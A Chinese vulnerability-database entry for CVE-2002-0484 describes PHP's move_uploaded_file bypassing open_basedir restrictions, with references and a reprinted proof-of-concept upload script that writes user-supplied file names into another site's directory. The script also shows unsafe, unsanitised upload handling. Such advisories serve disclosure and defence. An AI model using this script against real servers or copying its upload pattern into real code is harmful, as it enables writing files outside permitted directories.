PHP Move_Uploaded_File Open_Basedir欺诈漏洞

PHP Move_Uploaded_File Open_Basedir欺诈漏洞

漏洞ID 1106646 漏洞类型 访问验证错误
发布时间 2002-03-17 更新时间 2005-05-02
图片[1]-PHP Move_Uploaded_File Open_Basedir欺诈漏洞-安全小百科CVE编号 CVE-2002-0484
图片[2]-PHP Move_Uploaded_File Open_Basedir欺诈漏洞-安全小百科CNNVD-ID CNNVD-200208-205
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21347
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-205
|漏洞详情
PHP中的move_uploaded_file不检查基础目录(open_basedir)。远程攻击者可以利用该漏洞下载系统非计划位置文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/4325/info

PHP is a server side scripting language, designed to be embedded within HTML files. It is available for Windows, Linux, and many Unix based operating systems. It is commonly used for web development, and is very widely deployed.

It has been reported that the move_uploaded_file function lacks an open_basedir check. The effect of this issue is that this function may be used to perform file operations on directories outside of those specified by the open_basedir setting.

This vulnerability may not be exploited to overwrite existing files. 

<?

$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];

$size_limit = "100000"; // set size limit in bytes

if ($file){
if ($size < $size_limit){

move_uploaded_file($temp,
"/domains/somebodyelse.org/public_html/www/test/".$file);
echo "The file <tt>$file</tt> was sucessfully
uploaded";
} else {
echo "Sorry, your file exceeds the size limit of $size_limit
bytes";
}}

echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>
|参考资料

来源:BUGTRAQ
名称:20020321Re:move_uploaded_filebreakssafe_moderestrictionsinPHP
链接:http://online.securityfocus.com/archive/1/263259
来源:BUGTRAQ
名称:20020317move_uploaded_filebreakssafe_moderestrictionsinPHP
链接:http://online.securityfocus.com/archive/1/262999
来源:bugs.php.net
链接:http://bugs.php.net/bug.php?id=16128
来源:BID
名称:4325
链接:http://www.securityfocus.com/bid/4325
来源:XF
名称:php-moveuploadedfile-create-files(8591)
链接:http://www.iss.net/security_center/static/8591.php
来源:BUGTRAQ
名称:20020322Re:move_uploaded_filebreakssafe_moderestrictionsinPHP
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=101683938806677&w;=2

相关推荐: Informix SQL Temporary Log File Symbolic Link Vulnerability

Informix SQL Temporary Log File Symbolic Link Vulnerability 漏洞ID 1102937 漏洞类型 Origin Validation Error 发布时间 2001-09-04 更新时间 2001-09…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享